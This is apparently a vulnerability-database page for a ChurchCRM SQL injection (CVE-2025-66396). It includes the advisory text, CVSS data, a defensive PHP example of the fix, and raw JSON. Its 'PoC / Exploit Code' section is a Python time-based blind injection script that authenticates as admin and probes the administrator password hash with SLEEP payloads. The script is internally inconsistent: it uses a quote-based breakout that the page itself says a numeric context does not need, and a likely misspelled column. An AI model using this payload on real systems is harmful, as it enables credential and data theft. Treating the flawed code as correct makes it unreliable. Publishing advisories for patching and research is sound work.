Security Vulnerability Report
CVE-2025-66396 CVSS 7.2 HIGH

Published: 2025-12-17 20:15:56
Last Modified: 2025-12-18 19:08:03

Description

ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/UserEditor.php` file. When an administrator saves a user's configuration settings, the keys of the `type` POST parameter array are not properly sanitized or type-casted before being used in multiple SQL queries. This allows a malicious or compromised administrator account to execute arbitrary SQL commands, including time-based blind SQL injection attacks, to directly interact with the database. The vulnerability is located in `src/UserEditor.php` within the logic that handles saving user-specific configuration settings. The `type` parameter from the POST request is processed as an array. The code iterates through this array and uses `key($type)` to extract the array key, which is expected to be a numeric ID. This key is then assigned to the `$id` variable. The `$id` variable is subsequently concatenated directly into a `SELECT` and an `UPDATE` SQL query without any sanitization or validation, making it an injection vector. Although the vulnerability requires administrator privileges to exploit, it allows a malicious or compromised admin account to execute arbitrary SQL queries. This can be used to bypass any application-level logging or restrictions, directly manipulate the database, exfiltrate, modify, or delete all data (including other user credentials, financial records, and personal information), and could potentially lead to further system compromise, such as writing files to the server, depending on the database's configuration and user privileges. Version 6.5.3 patches the issue.
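As an added illustration of the bug class described above (this is not ChurchCRM's code, and the table and column names `user_cfg`, `cfg_id`, `usr_id`, `cfg_value` are placeholders), the vulnerable shape is shown next to a hardened version that validates and casts the array key and binds all inputs through a prepared statement:

```php
<?php
// Added illustration of the bug class described in the advisory; NOT ChurchCRM's code.
// Table/column names (user_cfg, cfg_id, usr_id, cfg_value) are placeholders.

// Vulnerable shape: the key of $_POST['type'] is assumed to be a numeric ID and
// concatenated into the query. Because the key lands in a numeric context, the
// injected text needs no quote character, so quote-escaping alone would not
// have helped; the missing step is validating and casting the key to an integer.
function saveSettingVulnerable(PDO $db, int $userId, array $type): void
{
    $id    = key($type);          // attacker-controlled, never cast
    $value = current($type);
    $db->exec("UPDATE user_cfg SET cfg_value = '$value'
               WHERE cfg_id = $id AND usr_id = $userId");
}

// Hardened shape: accept only a plain unsigned integer key, then bind every
// input through a prepared statement so the SQL text itself is constant.
function saveSettingHardened(PDO $db, int $userId, array $type): bool
{
    $rawId = key($type);          // PHP yields int for "7", string for anything else
    // ctype_digit() passes only [0-9]+ ; "1 OR 1=1", "1e3" and "" all fail.
    if ($rawId === null || !ctype_digit((string) $rawId)) {
        return false;             // refuse (and log) instead of building the query
    }
    $stmt = $db->prepare(
        'UPDATE user_cfg SET cfg_value = :val WHERE cfg_id = :id AND usr_id = :uid'
    );
    $stmt->bindValue(':val', (string) current($type), PDO::PARAM_STR);
    $stmt->bindValue(':id',  (int) $rawId,            PDO::PARAM_INT);
    $stmt->bindValue(':uid', $userId,                 PDO::PARAM_INT);
    return $stmt->execute() && $stmt->rowCount() === 1;
}

// Self-contained demo against an in-memory SQLite table (constructed data).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE user_cfg (cfg_id INTEGER, usr_id INTEGER, cfg_value TEXT)');
$db->exec("INSERT INTO user_cfg VALUES (1, 7, 'old'), (2, 7, 'old')");

$hostile = ['1 OR 1=1' => 'x'];      // shape of a tampered type[] key
$benign  = [2 => 'new'];              // shape of a legitimate type[2]=new

var_dump(saveSettingHardened($db, 7, $hostile)); // rejected before any SQL runs
var_dump(saveSettingHardened($db, 7, $benign));  // updates exactly one row
```

The same `ctype_digit` check and `PDO::PARAM_INT` binding apply to the `SELECT` that the advisory says also receives `$id`; the rule is that an ID taken from an array key is input like any other and never reaches the SQL string.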

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:* - VULNERABLE
ChurchCRM < 6.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import time

# CVE-2025-66396 SQL Injection PoC for ChurchCRM
# Target: ChurchCRM < 6.5.3
# Location: src/UserEditor.php
# Type: Time-based blind SQL injection

target_url = "http://target-url/src/UserEditor.php"

# Authentication - Requires admin credentials or session
login_url = "http://target-url/src/api/authenticate.php"
auth_data = {
    "UserName": "admin",
    "Password": "admin_password"
}

session = requests.Session()


def login():
    response = session.post(login_url, data=auth_data)
    return "auth_token" in response.text or response.status_code == 200


def extract_data_via_sql_injection(payload):
    """
    Time-based blind SQL injection payload example
    Extracts database version information
    """
    # Malicious type parameter with SQL injection payload
    data = {
        "type": {
            f"1' AND (SELECT CASE WHEN ({payload}) THEN SLEEP(5) ELSE 0 END) AND '1'='1": "value"
        },
        "Action": "saveSettings",
        "UserID": "1"
    }
    start_time = time.time()
    response = session.post(target_url, data=data)
    elapsed = time.time() - start_time
    return elapsed > 4  # If response took >4 seconds, condition was true


def build_boolean_payload(condition):
    """Build payload for boolean-based blind injection"""
    # Example: Check if database version contains '5'
    return f"(SELECT SUBSTRING(@@version,1,1))='{condition}'"


def exploit():
    if not login():
        print("[-] Authentication failed")
        return
    print("[+] Logged in successfully")

    # Time-based blind injection to extract admin password hash
    # Example: Extract first character of user password
    payload = "(SELECT SUBSTRING(user_pasword,1,1) FROM user_user WHERE bSecRole=1 LIMIT 1)='a'"

    # Test different characters
    for char in 'abcdefghijklmnopqrstuvwxyz0123456789':
        test_payload = f"(SELECT SUBSTRING(user_pasword,1,1) FROM user_user WHERE bSecRole=1 LIMIT 1)='{char}'"
        if extract_data_via_sql_injection(test_payload):
            print(f"[+] Found character: {char}")
            break


if __name__ == "__main__":
    exploit()
```

References

https://github.com/ChurchCRM/CRM/security/advisories/GHSA-whpp-wx64-4qp9 (Exploit, Vendor Advisory)
Weakness: CWE-89 (SQL Injection)

Raw JSON Data

```json
{"cve": {"id": "CVE-2025-66396", "sourceIdentifier": "[email protected]", "published": "2025-12-17T20:15:55.870", "lastModified": "2025-12-18T19:08:03.360", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "ChurchCRM is an open-source church management system. Prior to version 6.5.3, a SQL injection vulnerability exists in the `src/UserEditor.php` file. When an administrator saves a user's configuration settings, the keys of the `type` POST parameter array are not properly sanitized or type-casted before being used in multiple SQL queries. This allows a malicious or compromised administrator account to execute arbitrary SQL commands, including time-based blind SQL injection attacks, to directly interact with the database. The vulnerability is located in `src/UserEditor.php` within the logic that handles saving user-specific configuration settings. The `type` parameter from the POST request is processed as an array. The code iterates through this array and uses `key($type)` to extract the array key, which is expected to be a numeric ID. This key is then assigned to the `$id` variable. The `$id` variable is subsequently concatenated directly into a `SELECT` and an `UPDATE` SQL query without any sanitization or validation, making it an injection vector. Although the vulnerability requires administrator privileges to exploit, it allows a malicious or compromised admin account to execute arbitrary SQL queries. This can be used to bypass any application-level logging or restrictions, directly manipulate the database, exfiltrate, modify, or delete all data (including other user credentials, financial records, and personal information), and could potentially lead to further system compromise, such as writing files to the server, depending on the database's configuration and user privileges. Version 6.5.3 patches the issue."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:churchcrm:churchcrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "6.5.3", "matchCriteriaId": "5B1435CA-1370-4154-85E0-6AF1846DEEBD"}]}]}], "references": [{"url": "https://github.com/ChurchCRM/CRM/security/advisories/GHSA-whpp-wx64-4qp9", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}]}}
```